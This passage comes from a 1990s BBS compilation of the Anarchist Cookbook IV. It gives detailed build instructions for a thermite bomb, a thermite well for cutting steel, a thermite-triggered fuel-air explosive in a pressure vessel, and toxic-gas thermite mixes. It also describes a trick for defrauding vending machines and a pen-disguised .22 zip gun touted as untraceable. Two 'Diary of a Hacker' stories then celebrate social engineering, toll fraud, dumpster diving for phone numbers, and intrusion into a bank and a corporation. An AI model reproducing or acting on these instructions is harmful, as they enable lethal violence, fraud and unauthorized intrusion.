   Mix together well and and enough water to wet down plaster. Pour it into a
mold and let it sit for 1/2 hour. Pour off any extra water that seperates out
on top. Let this dry in the sun for at least a week. Or dry in the sun for 
one day and put in a 250 degree F. oven for a couple of hours. Drill it out 
for a first fire mix when dry.

                           THERMITE BOMB: 
   Thermite can be made to explode by taking the cast thermite formula and 
substituting fine powdered aluminum for the coarse/fine mix. Take 15 grams of
first fire mix and put in the center of a piece of aluminum foil. Insert a 
waterproof fuse into the mix and gather up the foil around the fuse. 
Waterproof the foil/fuse with a thin coat of wax. Obtain a two-piece 
spherical mold with a diameter of about 4-5 inches. Wax or oil the inside of 
the mold to help release the thermite. Now, fill one half of themold with the
cast thermite. Put the first fire/fuse package into the center of the filled 
mold. Fill the other half of the mold with the thermite and assemble mold. 
The mold will have to have a hole in it for the fuse to stick out. In about 
an hour, carefully separate the mold. You should have a ball of thermite with
the first fire mix in the center of it, and the fuse sticking out of the 
ball. Dry the ball in the sun for about a week. DO NOT DRY IT IN AN OVEN! The
fuse ignites the first fire mix which in turn ignites the thermite. Since the
thermite is ignited from the center out, the heat builds up in the thermite 
and it burns faster than normal. The result is a small explosion. The 
thermite ball burns in a split second and throws molten iron and slag around.
Use this carefully!

                            THERMITE WELL: 
   To cut metal with thermite, take a refractory crucible and drill a 1/4 in.
hole in the bottom. Epoxy a thin (20 ga.) sheet of mild steel over the hole. 
Allow the epoxy to dry. Fill the crucible with ferro-thermite and insert a 
first fire igniter in the thermite. Fashion a standoff to the crucible. This 
should hold the crucible about 1 1/2 in. up. Place the well over your target 
and ignite the first fire. The well works this way. The thermite burns, 
making slag and iron. Since the iron is heavier it goes to the bottom of the 
well. The molten iron burns through the metal sheet. This produces a small 
delay which gives the iron and slag more time to separate fully. The molten 
iron drips out through the hole in the bottom of the crucible. The standoff 
allows the thermite to continue flowing out of the crucible. The force of the
dripping iron bores a hole in the target. A 2 lb. thermite well can penetrate
up to 3/4 in. of steel. Experiment with different configurations to get 
maximum penetration. For a crucible, try a flower pot coated with a magnesium
oxide layer. Sometimes the pot cracks however. Take the cast thermite 
formula and add 50% ferro-thermite to it. This produces a fair amount of iron
plus a very liquid slag.

                     THERMITE FUEL-AIR EXPLOSION: 
   This is a very dangerous device. Ask yourself if you really truly want to 
make it before you do any work on it. It is next to impossible to give any 
dimensions of containers or weights of charges because of the availability of
parts changes from one person to the next. However here is a general 
description of this device affectionately known as a HELLHOUND. Make a 
thermite charge in a 1/8 in. wall pipe. This charge must be electrically 
ignited. At the opposite end of the pipe away from the ignitor side put a 
small explosive charge of flash powder weighing about 1 oz. Drill a small 
hole in a pipe end cap and run the wires from the ignitor through the hole. 
Seal the wires and hole up with fuel proof epoxy or cement. Try ferrule 
cement available at sporting goods stores. Dope the threads of the end caps 
with a good pipe dope and screw them onto the pipe. This gives you a thermite
charge in an iron pipe arranged so that when the thermite is electrically 
ignited, it will burn from one end to the other finally setting of the flash 
powder charge. Place this device in a larger pipe or very stout metal 
container which is sealed at one end. Use a couple of metal "spiders" to keep
the device away from the walls or ends of the larger container. Run the wires
out through the wall of the container and seal the wires with the fuel proof 
epoxy. Fill the container with a volatile liquid fuel. Acetone or gasoline 
works great. Now seal up the container with an appropriate end cap and it is 
done. The device works like this: Attach a timer-power supply to the wires. 
When the thermite is ignited it superheats the liquid fuel. Since the 
container is strong enough to hold the pressure the fuel does not boil. When 
the thermite burns down to the explosive, it explodes rupturing the container
and releasing the superheated fuel. The fuel expands, cooling off and making 
a fine mist and vapor that mixes with the surrounding air. The hot thermite 
slag is also thrown into the air which ignites the fuel-air mix. The result 
is obvious. Try about 1 1/2 lbs of thermite to a gallon of fuel. For the 
pressure vessel, try an old pressure cooker. Because the fuel may dissolve 
the epoxy don't keep this device around for very long. But ask yourself, do 
you really want to make this?

                           EXOTIC THERMITES: 
   Thermites can also be made from teflon-magnesium or metal flourides-
magnesium or aluminum. If there is an excess of flouride compound in the mix-
ture, flourine gas can be released. Flourine is extremely corrosive and 
reactive. The gas can cause organic material to burst into flames by mere 
contact. For teflon-magnesium use 67% teflon and 33% magnesium. A strong 
first fire igniter should be used to ignite this mixture. Both the teflon and
the magnesium should be in powdered form. Do not inhale any smoke from the 
burning mixture. If you use metal-florides instead of teflon, use flourides 
of low energy metals. Lead flouride is a good example. Try using 90% lead 
flouride and 10% aluminum. 

                              Warning: 
   Flouride compounds can be very poisonous. They are approximately equal to 
cyanide compounds. Another exotic mix is tricalcium orthophosphate and 
aluminum. When this burns, it forms calcium phosphide which when contacts 
water releases hydrogen phosphide which can ignite spontaneously in air. 
Tricalcium orthophosphate has the formula Ca3(PO4)2 and is known as white-
lockite. Use about 75% orthophosphate and 25% aluminum. This ratio may have 
to be altered for better burning as I have not experimented with it much and
don't know if more aluminum may reduce the calcium better. It does work but
it is a hard to ignite mixture. A first fire mix containing a few percent of 
magnesium works well. Fighting thermite fires: Two ways to fight thermite 
fires are either smothering the thermite with sand. This doesn't put out the 
thermite but it does help contain it and block some of the heat. The other 
way is to flood the thermite with a great amount of water. This helps to 
break the thermite apart and stop the reaction. If you use a small amount of 
water, an explosion may result as the thermite may reduce the water and 
release hydrogen gas. Thermite can start fires from the heat radiating from 
the reaction. Nearby flammable substances can catch fire even though no 
sparks or flame touch them.
                         *** Kilroy was here ***

Compiled for the '94 CookBook 4.14 -- Exodus

Heavly edited by: _--=PeEll=--_(tm)  When I found this phile it was one line
and it gave you an error that said devided by zero.
                           ** CONCLUSION **


Well, thats it! The Anarchist CookBook IV, release version 4.14.  It 
has taken a little over a year to compile all these files from 
dozens of anarchy books and filez.  I even gave up my board, The 
Black Gate, and my modeming to compile this offline.  There have 
been several release versions that were never really released into 
the public.  It seemed everytime I was ready to release it, I got 
more stuff to put in it.  I finally stopped changing ver. ## and 
left it at 4.14, in memory and salute of the 414's, who until they 
were caught, were the BEST HaCkinG and PhreAKiNg group out there.  
My hat goes off to the Jolly Roger for his inspiration, and to the 
editors of The Big Book Of Mischief, without whom there would be no 
references.  The release date of The Anarchist CookBook IV is June, 
1994.  Well, now that I'm done, my board will go back up, and I will 
begin the distribution.  But for those who are impatient for it to 
get to them, it is available straight off The Black Gate BBS.  Until 
then, Thanx for your dedication to the HaCkiNG and PhrEaKIng world.
Exodus and The Black Gate BBS are available to the Tri-State area, 
and I will be calling boards in the North Jersey area ONLY.  If you 
can't get in touch with me at my board, call around the 201 exchange.
I should be around a board or two.  L8r.. and Thanx for the Support!


                --==>>( Exodus )<<==--
              Sysop of The Black Gate BBS
                ThE BesT iN EliTe MaiLIndex of Additions to the Anarchist Cookbook
--------------------------------------------

001. Ripping off Coke Machines 
002. Build an  original style zip gun
003. Diary of a hacker part one
004. Diary of a hacker part two
005. How to create a new identity
006. Findind Security Holes
007. Hacking techniques
008. Composite Rocket Fuels
009. The Complete Social Engineering faq's
010. Association Betting System
011. The Beginners Betting System
012. The Dream Racing System
013. The NetProfits Racing Plan
014. The Professional Betting System
015. Unix Hacking Tutorial
016. Extract from the New York Times
017. Unix Hacking Commands
018. Home Brew Blast Cannon
019. Down The Road Missile
020. Internet email security
021. Pneumatic spud gun
022. The School Stoppers Textbook
023. The Big Book of Mischief
024. Terror Handbook - 100% bombs and explosives
025. Beginners guide to hacking and phreaking
026. Easy Grenades/Rockets
027. toilet bowl cleaner Bomb
028. Blowgun
ripping off pop machinez by od^phreak


Ok. First of all, I have tried every single file I could find on how 
to rip off coin changers, candy machines, etc. etc. None of them worked. 
Believe me, I tried every one. I don't know if these articles were just to 
gain a better U/L D/L ratio or what but they didn't work. I have one that 
does. 										
										
This trick only works on COCA COLA machines. Don't ask me why. It has 
something to do with the validator on the machines. 				
										
										
			Take a dollar bill (as crisp as possible) and lay it 
george-side-up with our dear first prez. facing left as if you were going to 
stick it in the machine. now take some scotch tape and make 2 strips a long as 
the dollar. now take those pieces of tape and attach them to the white edge of
the dollar facing you (just the one edge). your dollar should look like this 
now.

				-----
				-   -  <---- Dollar
				-   -
				-   -
				-   -
				+---+
				|   |
				|   |  <---Strips of tape 
				|   |
				|   |

	Now take scotch tape and make bars across the two pieces of tape 
already connected to your dollar(sort of like a ladder) overlapping each one 
just a little. get down to the bottom and turn the bill over and do the same 
thing on the other side (just the ladder rungs). now take a pair of sissors 
and trim the tape to make it all even and square. now take something hard and 
run it over the tape a few times to ensure that it won't come off. (remeber 
kindergarten? put the glue on and press down hard while you count to 10?)
now you're ready. take your new and improved currency to the nearest coke 
machine with a dollar bill vindicator and insert your dollar. you have to let 
the bill go in almost until you cant hold the tape anymore (it's important to 
let the bill get in far enough for the scanner to read the dollar) and then 
whip it back out. You should hear the click of the machine and your change 
drop out. make your selection and voila! Now the cool thing is when you find 
a machine that only takes 50 cents. cause you get your coke and 50 cents!!




note: this document is for informational purposes ONLY. The author of this
article assumes no responsibility for the use or mis-use of this article.


 thank you and c-ya later

      od^Phreak
  -=*> Invisible stalker
       hell's  hackers<*=-
             proudly presents...

     ********************************
     *                              *
     *     The ring master gun I    *
     *------------------------------*
           how to build a .22
     *------------------------------*
     *                              *
     ********************************

  Revised: march 7, 1986
  -------
  date: january 22, 1984
  ----

  preface:
  -------

    the gun which I am about to explain how to build is an original style zip-
 gun. Other zip-guns have been made, but most have been of inferior quality
 and are very dangerous to operate. The gun I have constructed is easy to use
 and safe to operate.

  History:
  -------
    zip-guns where used during the gang war era because of their easiness to
 build and their small size. Many prisoners of have been known to construct
 zip-guns while in jail (but I have not heard of any prisoner escaping using
 a zip-gun).

  ===========
  -Materials-
  ===========

    you will need:
    -------------

  (1) ball point pen - approximately 5.3 Inches long (metal).

  (1) Strong spring - approximately 1.59 Inches long (able to fit inside
      2nd half and a little bit of the first).

  (1) Strong metal bar - approximately 2.5 Inches long (able to fit
      inside pen).

  (1) Strong small metal bar (a little bigger then the circumference of
      the spring and able to slide easily thru the 2nd half of the pen).

   A few .22 Caliber bullets.

    Optional:
    --------

  (1) soldering iron.

  ==============
  -Construction-
  ==============

   -please note: diagrams not to scale.

    First untwist the ball point pen and take out all the insides (you may
 break them to get them out because they are not needed and should be
 discarded (see diag. A).

 -The pen (diag. A)-

       --------------------------
     -<             +           :*]
       --------------------------
             ^             ^
          1St half      2nd half

      < denotes pen tip (where the ink comes out).
      + Denotes middle (separation point of pen).
     *] denotes push button.

    Now take the metal bar (larger one) and attach it to the push button (see
  Diag. B).

 -Firing pin (diag.B)-

      --------------------*
               ^          ^
          metal bar   push button

    you can attach it by either shoving the metal bar into the bottom
 or by soldering it in place (please note: I recommend soldering the metal
 bar in place). Important - the metal bar must be attached in the exact
 middle of the push button (the metal bar will act as a striking pin and
 must be in the exact center so it will strike the middle of the bullet
 causing the bullet to go off).
    With the metal bar now firmly attached to the push button, put the
 push button inside the pen like it should be (see diag. C).

 -Firing pin placement (diag. C)

          --------------------
     -B-B-:-B-B-B-B-B-B-B-B-B-*]
          --------------------
                   ^
                2nd half

    -B- denotes metal bar.
      : Denotes middle (separation point of pen).
     *] denotes push button.

    Now take the spring and slide it over the metal bar (see diag.D).

 -Placement of spring (diag. D)

          ---------------------
     -B-B-:BXXXXXXXXXXXXXXXXXXB*]
          ---------------------
                    ^
                 2nd half

    -B- denotes metal bar.
      : Denotes middle (separation point of pen).
     *] denotes push button.
      X denotes spring around metal bar.

    Now with the spring around the metal bar and the push button where it
 Should be, attach (by soldering or twisting, soldering preferred) the
 small metal bar to the metal bar (see diag.E).

 -Attachment of small metal bar
    (diag. E)

       .  -------------------
   -B-B^B-:BXXXXXXXXXXXXXXXXB*]
       '  -------------------

    -B- denotes metal bar.
      : Denotes middle (separation point of pen).
     *] denotes push button.
      X denotes spring around metal.
      ^ denotes small metal bar attached to metal bar.

    Note: it might also be helpful to solder the small metal bar to the
  Spring along with soldering it to the metal bar.

  ==========================
  -Test of firing mechanism-
  ==========================

    pull back push button as far as it will go while holding onto the second
 half of the pen. Now let go and the metal bar (longer one) should snap
 forward and then return to its approximate starting position.

  ==============
  -Finishing up-
  ==============

    placement of bullet:
    -------------------

    a .22 Caliber bullet should now be placed in the 1st half of the "pen"
 approximately 1 1/2 millimeters in front of where the metal bar would
 be if the "pen" was put back together. Be sure to tape (or whatever you think
 will work) the bullet inside the casing or else the bullet, if moved,
 might go off accidentally (see diag.F).

 -Bullet placement (diag. F)-

      ---------------------------
     <      <* -B^B:BXXXXXXXXXXXB*]
      ---------------------------
            ^            ^
         1St half     2nd half

    -B- denotes metal bar.
      : Denotes middle (sepearation point of pen).
     *] denotes push button.
      X denotes spring around metal bar.
      ^ denotes small metal bar attached to metal bar.

  How to operate:
  --------------

    Pull back on push button as far as it will go, then let go - the bullet
 has just been fired (easy, right?).
    If you wish to shoot another bullet, untwist the "pen", take out the
 shell and reload (see placement of bullet).

  Notes:
  -----

    the bullet will tumble when shot instead of the spiraling because the
 inside of the 1st half (the barrel) has no lands or grooves. Tumbling
 is good because the bullet will rip thru a target, but it does cause the
 bullet to be off target approximately 3-4 inches. Having no lands or grooves
 makes the bullet hard to be traced back to its source (no striations).
 If you wish to make lands and grooves, you can by taking a screw and
 twisting it inside the 1st half of the "pen" (adds striations to bullet).
    I would also advise you to cut off the tip of the "pen". If the tip is
 left on, the bullet will still shoot, but it will blow thru the tip and send
 pieces of the pen flying in different directions (also causing the bullet to
 be off target.)

 -Optional: diagram-removal of tip-

        /
        /----------------
      --/               :
    <   /               :
      --/               :
        /----------------
        /

      < denotes tip (where ink used to come out).
      : Denotes middle (separation point of pen).
      / Denotes where tip should be removed (just enough to let the
        bullet shoot out).

 How it should look when it is complete

 -complete diagaram (with tip removed)-

       -----------:-------------
      /-----------:-------------
         <*+= B-^-:BXXXXXXXXXXXB*]
      /-----------:-------------
       -----------:-------------

      / Denotes where the pen "caves in" after tip is removed.
   <*+= Denotes .22 Bullet taped to bottom.
    -B- denotes metal bar.
      ^ denotes small metal bar.
      : Denotes middle (the separating point of the pen).
      X denotes spring around metal bar.
     *] denotes push button.

  ============================
  -Advantages & disadvantages-
  ============================

  disadvantages:
  -------------

    (1) one shot capacity-only one bullet can be shot at a time (you must
        reload the gun everytime you want to shoot).

    (2) Not as accurate as a regular .22 Caliber gun (but the gun was not
        intended for target shooting).

    (3) Looking like a pen may cause dangerous situations.

  Advantages:
  ----------

    (1) easy to build.

    (2) Easy to use.

  (3&4) Easy to conceal and discard.

    (5) Low cost (almost nothing).

----------------------------------------

    Later, dazed and confused ones...

  -=*>Invisible stalker
      hell's  hackers<*=-

  look for:
  --------
  military numbers and how to access them
  portable black box
  portable white box
  ring master gun volume i-iii
  telenet hacking volume I & ii
  trace detection
  trashing techniques volume i-iii
  voice memo hacking volume I & ii


  disclaimer:
  ----------

   all information contained in this file is for information purposes only.
 The author takes no responsibility for the action(s) of his readers. The
 reader in question accepts total responsibility for any consequences
 resulting due to the presence of this file.
  Acknowledgements:
  ----------------

  I would like to thank dr. Nikon and the sumpman (mr. Forensic) for
  helping me put together this file.

  -=*>Invisible stalker
      hell's  hackers<*=-



        
                             Diary of a Hacker
                                  Part 1

        
        What I am about to write about happened in October of 1988, 
        right after I had turned 16. 
       
        Yes, I had a Computer.
        Yes, I was a hacker.
        Yes, this is my story.

        This story is all true.  The events in the story are as real
        as the noses on your faces.  Any attempt to change this story
        would be boring, and unnescessary.

        Hello.  My Handle is The Cuisinart Blade, (I have since changed it)
        most people called me C.B., just as another nickname.  I
        got into computers because I always had a knack for Games, 
        Programs, Etc...  I loved the feel of the keyboard as I typed,
        espically around Midnight, when School was only 7 hours away.
        That Dickhead in your 1st hour waiting to pick on you at the
        stroke of the clock.  What little that he knew.
        I Loved the feeling of flying through the 'Net, talking to the 
        other Hackers like me, always trying to impress one another.
        They came in all fashions of Handles: The Ax Murderer, Psycho,
        The Hacker Kid, Phobia, Etc...the list is nearly endless.  And
        each with an utterly unique personality, so far advanced from
        the Morons we all remember at high school.  I loved talking to
        these "Wanderers of the Wunderland" so much, I would call all
        over the united states just to do that.
        I remember back in 1988, 9600 was almost as uncommon as the
        newest modems of today.  I loved to suck down that Jolt, turn
        on the overhead light in the basement, and hack until morning.
        Then goto school to have that enormus football jock try to
        scare me into submission. I will admit that, yes, he did
        scare me.  But what a fool he was, thinking that pure brawn
        was power.  Knowledge IS power.  I never did good in High 
        School.  Knowledge is not there, it was in the 'Net!  THAT
        was where I was a King.  That was where I was a God.  ANYONE
        who has truely roamed the 'Net or been in that type of world
        could tell you that, (Right, King Blotto?) hands down.
        I loved running home, or taking the bus, right into my
        basement!  Homework?  Bah!  What a waste of time it was,
        compared to the thrill of Hacking?  Homework was little more
        than review.  I sat down and got onto my Computer and began to
        type. I called a rather large BBS in which, Hackers frequented.
        Nowadays they are considered "Wandering" Boards.  They appear to
        wander because they change phone numbers all the time.
        Anyway, I called up my favorite Pirate BBS and went onto Multi-
        nodal chat to talk to the others about their exploits.  Some of 
        them had told me of their abilities to smash entire phone
        networks, others had told me of their A-Typical grade changes,
        (Yawn)  But most of all I loved to brag.  The unwritten rule
        in being a hacker, you're nothing unless you have something to
        brag about.  At the time, I didn't, so I decided to get a name
        in the computer Hacking Club and do just that: Hack.
        At first I wondered where I should go, what I should do.
        I had no idea where to begin.  I had been all over the world
        in the 'Net, and nothing to show for it, other than just knowing
        of everyone, or everything.  I needed more.  That is the answer
        to everything in the mind of a Hacker, the NEED to know.
        I decided to try something small.
        That night, my friend, (who I will call Dr.Antristo) and I,
        called up another Pirate BBS and Downloaded the number of a 
        rather prominent business, (at the time) and decided to call.
        Our biggest fear was being traced, so we got togther and built
        what is nowadays almost routine, (from what I hear) a BOX.
        I made the call and found myself looking into a Menu System, 
        that asked for a NAME, and Security ID.  I had no idea about
        any security ID, or anyone who worked there, so I decided to
        Hang up and try in a day or 2, AFTER I did some "Checking Up"
        on their Company.
        Wedensday came and went, I checked into the Directory, and 
        looked for a name, someone in the Company.  Personal Passwords
        were not being used at this company, (and they STILL arn't)
        so figuring that out was not important, but finding out the
        MAIN USER SYSTEM PASSWORD was.  No prob.  After finding out
        about a fellow who worked their, (Name Withheld), I called
        again.  This time the Menu popped up again, and I typed his name
        again it asked me for a System Password.  I knew the Voice
        Number to the Company, so I dialed it on my regular phone line
        and got some reception lady, you know the type, not too 
        bright, and just a tad naieve.  I told her I was in the
        Data Processing Department and was new, and had forgotten
        the System Password.  It took her all of about 10 seconds  
        to tell it to me.  She didn't even bother for proof.  So
        with that in my head I went ahead and typed it: X77-SYS1a.
        I was in.
        My Buddy watched, as I began to move through the menus, I got
        to check out the General Bulletin Listing, several up-and-
        coming projects, (heh heh 486?)  and even got to see who was
        late to work this morning.  I wanted to get some specs on the
        new things they had instore for the Commercial Market, but 
        I was unsure where to Download them to.  I was fearful of doing
        that to my own house, so I figured I would find another place.
        After rummaging throught the place for about 15 minutes, I 
        left.  Personally, I was estatic.  I had done it.  I had
        gone into a rather large business and gotten to look through 
        their system.  But I needed proof, or so I thought.  I wanted
        to show the Hackers of America, I was as good as them.  I 
        wanted what we all wanted.  To be noticed and respected by 
        the people who I would call my peers.
        Now I will admit that there were MANY who were far better than
        me.  There were guys who didn't pay a penny for any phone
        calls that they made.  Ma Bell was sure pissed!  There were
        others who were what I and others referred to as Professional
        Pirates.  These were the guys who not only wrote their own
        software, but Cracked anything they came across, knew were
        to get anything, and Just seemed to be great at anything they
        wanted to be.  These were the guys everyone tried to be like,
        they were the Football stars, Homecoming Kings, and all-american
        heroes of the 'Net.
        To us they were as close to god as the pope.
        Turns out that they were no older than most, but they were
        smarter, or had a head start.  These guys were, and many of them
        still are, unstoppable.
        I got talking to another Pirate later that evening, after I had 
        gone into the Company Mainframe, and told him of what I had
        done.  I thought at first he'd laugh at me, but instead, he
        practically begged me for that Password. He said everyone in
        this system at that moment would give me any Wares, (Warez for
        you newer Hackers & Pirates) I wanted.  Within 2 minutes of
        telling this guy, (Handle: Omega Man) the Multi-Node Chat
        was filled with over 20 different Hackers, Pirates, and 
        onlookers asking for the Password, offering me Wares, and
        other Numbers in exchange.  One guy, I will call Harlock, 
        offered me something none of the others could.  The ability
        to USE At&t all I wanted for free.  He said he would teach me
        how to use their LOOP Numbers and not get caught, also teach me
        to call other places, drop to their dos shells, and make hidden
        directories where I could put my "borrowed" Wares.  All for a
        Password.
        I accepted.
        Without hesitation, he gave me a number to his "Wandering" BBS.
        I disconnected with this one, and logged onto his.  It was a
        long distance call in the 216 area code.  I didn't want to stay
        too long, otherwise my parents would get REAL mad.
        I arrived at the Logon screen to be greeted with an enormus
        ANSI of a Kings Crown.  Followed by a System Password.
        The SysOp of the Board typed it in for me, and took me directly
        into Chat.  He told me that AT&T has what are called LOOP 
        numbers, numbers that are out of circulation, but can still
        be used.  Billing is not used, because the company writes it
        off as an expense on their annual tax bracket as for Public
        Relations, or Advertising.  They don't check up on them, 
        because with over 500 Million Nodes, and lines in this country
        they don't bother with the "Lost" ones.  (Currently there are
        around 75,000 LOOP Numbers in the 312/708 Area)
        He told me that in order to use one, you must find one, by
        what he called Garbage Screening.  He told me that around 
        where he lived they just chucked all the paper in the garbage
        bin and left it for the trash men on friday.  (he thanked god
        that Recycling hadn't REALLY started yet)  He advised me to do
        the same.  Once I had the numbers, keep a blacklist of them,
        (of which only 1/4th still work to this day.)
        Then he explained how to do it.  He said I was to dial the 
        number, wait for 2 "Chimes" then hit the Shift and Ctrl buttons.
        With Modem, (I still don't know how, but it worked so I am 
        telling you) it would give me a Dial Tone, and Wala!  I could
        then proceed to call anywhere in the world, under AT&T's Tab.
        Then he asked me for the Password which I happily gave him, (I
        may be a white-collar crook, but I am an Honorable one.)
        After writing it down, (I guess) he told me I was welcome to
        look around his system.  I thanked him for the Info, then 
        Logged offline.  I was Info Hungery!
        I had written the Directions for the LOOP numbers down and
        wanted to see what I could do.  I told Dr.Antristo to power
        up the MouseMobile (His Jalopy) 'cause we were gonna go
        shopping this evening.  'Round midnight, Dr.Antristo and I
        got to Oakbrook, a rather large Communications Hub for the
        Greater Chicagoland Area.  AT&T had just thrown its garbage 
        away and there was no one around.  I walked over to the bin,
        with Doc' in the Getaway Mouse, and looked for any kind of
        security measure.  It had a padlock, that was no where to be
        found.  I pushed the door open and took a look.  Bags of
        paper and more bags.  From what Harloack had told me, I 
        had hit the jackpot.  I climbed in, (You must understand, that
        this was the cleanest garbage I had ever seen) and began to 
        look for anything that had to do with numbers.  I also grabbed
        a pair of hefty bags full of paper with what looked like numbers
        then got to the car and we returned home.
        I dumped all the stuff onto the floor and began to rummage 
        through it.  I found a lot of office memos to call some
        Steve guy, and letters of recommendation, as well as a few
        Resumes'.  Then Luck.  A list of numbers that were said to 
        be disconnected or transferred to station (52?) for standard
        procedure.  Another list detailing numbers offline or as it 
        put it, "Out Of Circulation".  At last, O.O.C.'s!
        I wanted to know, I had to know.  I put one of them into my
        Telix Directory and ran it through.  After a few seconds of 
        prayer, I heard a high pitched noise, almost like a Modem, 
        but it was off a few bars.  Then I heard what I can only
        describe as a "Chime", then another...I hit the Shift and Ctrl
        Keys, and what almost sounded like Line shifting, I got a dial
        tone!
        Success!
        Dr.Antristo and I ran about the room hollering and yelling our
        thanks to the great Jolt god and we sat down at the computer and
        typed in the name of a Long Distance BBS, we could never call.
        Again, Success.  It didn't connect because it was busy, but
        it went back to Dial Tone again, and we tried another.
        The BBS was called Crystal Palace, and it was somewhere in 
        Canada.  We logged into it, ran through the usual newuser crap
        and spent an hour talking to the SysOp, who was watching us at
        the time.  We decided not to try again, until the phone bill
        came for the month.
        1 Week later it arrived.  I tore it apart to find all long
        distance calls done.  Only one to my Aunt Kathy in Michigian!
        The rest were Local!  I was so happy I didn't care if my father
        was yelling at me about opening his mail.  I called Dr.Antristo
        and told him the great news.  With this, we could do some real
        neat things, like call all those other Hacker Boards we could
        never reach.
        We decieded to call the most intresting on your list, one
        called ToC: The Obsidian Crackhouse.  It was in Germany, 
        a place where there seemed to be a ton of Elite Pirates.
        We dialed into the LOOP Number and then made the overseas call
        Connect 9600Bps!
        We tied into the BBS to find that we couldn't access, it was
        a Private BBS.  So we settled for something in our country,
        a place in the 404 Area Code.  A BBS called The Nutcracker
        Elite.  We got in and "Registered" No, we wern't Cops, No,
        Not Federal Agents, Etc.. then we looked around to see what
        this guy had.  Files I had never seen before, stuff from
        England, California, Germany, Holland, Ireland, Etc... Lists
        so long I couldn't believe what I was looking at.  I wanted
        to Download everything I saw, but I was still afraid of what
        might happen, trying to do that.  So I figured I would give
        ol' Harlock a Call.
        I finally got ahold of him on a Friday night, around 1 in the
        morning, and asked him what to do.  He told me what he did.
        He would use the LOOP Number, then call another Company, drop
        into their DOS, create a hidden Dir, then call out again, under
        THAT Companies Number.  It boggled my mind, so I had him
        explain it again.  The LOOP Number worked for you in several
        ways.  If you use a LOOP Number to call out, if you call from
        another HUB, it would look like you were calling from that area.
        So anyone Tracing would track it to that location, and if they 
        were good, they would only get as far as the LOOP Number 
        origin, in which case you use another number.  He warned me
        that the BOX was the only thing keeping AT&T from running a 
        trace from their "Hidden" Line to my house.  So I continued to
        use it.
        That night I called some bank in the 804 Area Code.  Found their
        General Logon Password, (from a Hacker in Vermont, thanks HAL!)
        and proceeded to drop to DOS.  I looked at their inferior setup, 
        all memory and nothing to show for it.  I created a Hidden DIR,
        then exited and called out from that location using one of their
        company lines to another BBS in the 213 Area Code, a BBS named
        Psychotic Interlude.  I got online and D/L'ed as much as I 
        could. (A whopping 3 Files)
        After Disconnection, I did another D/L to my house through the
        LOOP Number.  It worked.  The entire evening I was online at
        one place or another.  I had gotten about 15 Meg worth of Wares
        from around the country.  This Bank had so much memory it never
        would have missed it. (BTW, I never Deleted any of it so if you
        want it, you gotta go get it. ;) )
        I was really beginning to enjoy this.  The following evening, 
        I went online at my usual Hacker hangout and chatted with a
        few guys, the topic of the day was someone in Georgia was saying
        that he could take down the entire Phone Grid in that state.  
        And after doing what I did, I belived him.

        October 24th, 1988

        I went to Dr.Antristos house to pick up the software of what
        we hoped to be our new BBS.  I wanted to be a SysOp.  Too
        bad that he didn't have it.
        After discussing what we could do with our abilities, we
        wanted to see if we could get into a Large Corperation.
        Watch out world, we were arriving!
        That night, after slurping down a 24 pack of Jolt, we
        listened to some Black Sabbath, and Led Zepplin, (my favorite
        song by them is Cashmir on Physical Grafitti Album) we
        entered the world of the Hacker.
        We went to our usual LOOP Number and then dialed into a
        Corperation in Chicago.  (The name of which is withheld, 
        but I'll give you a clue, its a Computer Company Named IBM)
        Well, we got to their commercial menu, where they tell you
        all about their products, (Yawn) and how they're the best.
        If they were smart they wouldn't have agreed to giving 
        royalties to the creator of their Logon Program for all
        IBM Compatibles, and Regulars.  (Incidently, the guy who
        wrote that is now worth 8+ Bil)
        Anyways, we managed to snoop into General Information, but
        Dr.Antristo and I wanted more.  We wanted much more.
        So I decided to try that Newbie Crap with the Reception
        lady again.  I figured that if it worked once, it would work
        again.
        The lady, who turned out to be a male night security guard, 
        scolded me for calling so late, and muttered something about
        yuppies and their late hour workings.  He looked around on the
        desk of wherever he was and gave me a Password to enter the
        IBM Mainframe, (I still laugh at this chucklehead they had hired)
        and in less than 20 Seconds I was looking at Commands for the
        Office.  Turns out he gave me a Password that is not for General
        use.  I got an Office PW.
        I was looking at a menu that asked me if I wanted to shut off the
        lights!  I gave out a manical laugh!  I was god, I was immortal,
        I was....Hacking.  I decieded not to turn off the lights, but
        I wanted to look at future projects slated for the next year.
        After browsing around, I got bored and looked into the security
        matrix, and found a universal password and name collection.  I
        was feeling a bit evil that evening so, I switched, added, removed,
        and changed some passwords...heh heh.  Cruel to the people who
        think they're tough shit!
        I left IBM with a big grin, and a lot of experience.  Dr.Antristo
        told me that we ought to go after other things.  I wanted
        to know so much about everything, so I had it in my head I
        was going to do just that.

        Only thing was, how to do it!



        Look for Hacker2.zip for the continuation!

        Another fine Text of the -=M*A*S*Q*U*E*R*A*D*E=-






















                             
                              Diary of a Hacker 
                                  Part: II


        My Handle is The Cuisinart Blade.
        I am a Hacker.

        This is part 2 in a three part series about my adventures as
        a Hacker.  The events in these Text files are very real.  They
        are written as they occured.  All people in this have had their
        Handles changed, (unless otherwise specified).

        -To continue where I left off...

        I sent Dr.Antristo home after our "encounter" with IBM. I loved
        the fact I had entered one of the biggest Corps in the World!
        It was about 3:34 in the morning, I logged onto the Lunacy in
        the Abyss BBS, and went into the chat with my peers. After talking
        to them at length about my "Discoveries", I found them all asking
        me for the Passwords, and how I managed to get that far.  I told
        them that only an EXPERIENCED Hacker could do such things...I will
        admit, I was up on myself.  (shame)  These others, all 13 of them,
        were in Awe.  For once I was in the lead, I was able to scoff at
        some of the higher ups who had told me I would never achieve what
        they had.  I may not have been as good as they were, but I was
        up with them in the big leagues!
        Potempkin, Renwar, bermahn, The Drifter, Sewer Rat, and Thycho,
        a few names of those who were online at the time.  They were all
        very intrested in accquiring info+ on what I had gotten into.  I
        wanted to tell them, but I thought it best not to.  Not yet.....
        After chatting for half the evening, I finally went to sleep,
        wondering what my next move should be.  

        October 30th, 1988

        Dr.Antristo and I went Bin shopping again.  We dug up a record
        of Ex-employees scheduled to have their Passwords cleared from the
        system.  Someone loved us, to give us this trash.  We returned home
        to find Passwords, Doodling, more Loop Numbers, and an old records
        collection of New In-Service Numbers.  We wanted to know how AT&T
        worked, so we were going to check it out.  I first needed to talk to
        my friend/contact in Ohio.  I dialed up his number in the 216 Area
        and waited to chat with him.  He wasn't online.  Bummer.  I checked
        a few of the other BBS's in the general area looking for people who
        could tell me how one was able to crack into AT&T.  No one seemed to
        know.
        On the following evening we finally got our big break.  Another 
        Hacker, told us in exchange for Loop Numbers he would give us a 
        Password in the AT&T System.  We agreed.  He gave us the Password
        to a smaller area of AT&T and told us that it was pretty unguarded
        so we should have no problem finding what we wanted to look at.  I
        was and very much still am an Astronomy Buff.  I wanted to find out
